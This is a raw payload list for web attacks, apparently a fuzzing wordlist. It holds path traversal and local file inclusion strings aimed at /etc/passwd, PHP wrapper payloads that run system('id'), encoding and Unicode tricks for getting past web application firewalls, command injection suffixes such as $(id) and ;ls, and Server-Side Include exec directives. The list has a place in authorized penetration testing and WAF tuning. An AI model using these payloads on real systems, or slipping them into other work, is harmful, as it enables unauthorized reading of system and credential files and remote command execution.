filePath=../../../etc/passwd
allowed_path=../../../etc/passwd
download=../../../etc/passwd
upload=../../../etc/passwd
image=../../../etc/passwd
img=../../../etc/passwd
attachment=../../../etc/passwd
favicon=../../../etc/passwd
src=../../../etc/passwd

# ── LFI via path parameter patterns ──────────────────────────
page=../../../../etc/passwd
?page=../../../../etc/passwd
&file=../../../../etc/passwd
?file=../../etc/passwd
?template=../../../etc/passwd
?include=../../../etc/passwd
?view=../../../etc/passwd
?page=php://filter/convert.base64-encode/resource=config.php
?page=php://input
?page=data://text/plain,<?php system('id');?>
?page=expect://id
?page=file:///etc/passwd
?file=php://filter/convert.base64-encode/resource=config.php
?file=php://input
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdpZCcpOyA/Pg==
?template=php://filter/convert.base64-encode/resource=config.php
?template=data://text/plain,<?php system('id');?>
?include=../../../../etc/passwd%00

# ── Multi-byte encoding bypass ───────────────────────────────
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
..%c0%ae%c0%ae%c0%af..%c0%ae%c0%ae%c0%af..%c0%ae%c0%ae%c0%afetc%c0%ae%c0%ae%c0%afpasswd
..%e0%80%ae%c0%ae%c0%af..%e0%80%ae%c0%ae%c0%af..%e0%80%ae%c0%ae%c0%afetc%e0%80%ae%c0%ae%c0%afpasswd
..%f0%80%80%ae..%f0%80%80%ae..%f0%80%80%aetect%f0%80%80%afpasswd
..%f8%80%80%80%ae..%f8%80%80%80%ae..%f8%80%80%80%aetect%f8%80%80%80%afpasswd
%c0%ae%c0%ae%c0%af
%c0%2e%c0%2e%c0%2f
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%ae%c0%ae%c0%afpasswd
%e0%80%ae%e0%80%ae%e0%80%af
%e0%80%ae%e0%80%ae%e0%80%af%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%ae%e0%80%ae%e0%80%afpasswd
%f0%80%80%ae%f0%80%80%ae%f0%80%80%af
%f0%80%80%ae%f0%80%80%ae%f0%80%80%af%f0%80%80%ae%f0%80%80%ae%f0%80%80%afetc%f0%80%80%ae%f0%80%80%ae%f0%80%80%afpasswd

# ── Wide character / Unicode bypass ──────────────────────────
%uff0e%uff0e%u2215etc%u2215passwd
%uff0e%uff0e%uff0fetc%uff0fpasswd
%uff0e%uff0e%u2216etc%u2216passwd
%uff0e%uff0e%uEFC8etc%uEFC8passwd
%uff0e%uff0e%uff0f
%uff0e%uff0e%u2215
%u2215..%u2215..%u2215..%u2215etc%u2215passwd
%uff0e%uff0e%u2215
%u2215..%u2215..%u2215..%u2215etc%u2215passwd

# ── Backtick / command injection via LFI ─────────────────
../../../etc/passwd`
../../../etc/passwd$(id)
../../../etc/passwd|id
../../../etc/passwd;ls
`id`
$(id)
|id
;ls
../../../etc/passwd`id`
../../../etc/passwd$(whoami)
../../../etc/passwd$(ls)

# ── Emoji / special characters (WAF bypass) ─────────────────
..%E2%80%AEetc/passwd   # RTL override
..%E2%80%AE..%E2%80%AE..%E2%80%AEetc%2Fpasswd
..%E2%80%8B..%E2%80%8B..%E2%80%8Betc/passwd # Zero-width space
..%E2%80%8C..%E2%80%8C..%E2%80%8Cetc/passwd # Zero-width non-joiner
..%E2%80%8D..%E2%80%8D..%E2%80%8Detc/passwd # Zero-width joiner
..%C2%A0..%C2%A0..%C2%A0etc/passwd  # Non-breaking space
..%09..%09..%09etc/passwd           # Tab
..%0a..%0a..%0aetc/passwd           # Newline
..%0d..%0d..%0detc/passwd           # Carriage return
..%0d%0a..%0d%0a..%0d%0aetc/passwd # CRLF
....//....//....//etc/passwd
..././..././..././etc/passwd
..%252f..%252f..%252fetc%252fpasswd
..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
../..//..//etc/passwd
..;/..;/..;/etc/passwd
..%3b..%3b..%3betc%2fpasswd
..%25252f..%25252f..%25252fetc%25252fpasswd

# ── SSI (Server-Side Includes) ─────────────────────────────
<!--#include virtual="/etc/passwd"-->
<!--#include file="/etc/passwd"-->
<!--#exec cmd="id"-->
<!--#exec cgi="/cgi-bin/test"-->
<!--#echo var="DOCUMENT_ROOT"-->
<!--#echo var="DATE_LOCAL"-->
<!--#set var="foo" value="bar"-->
<!--#printenv-->
<!--#fsize file="/etc/passwd"-->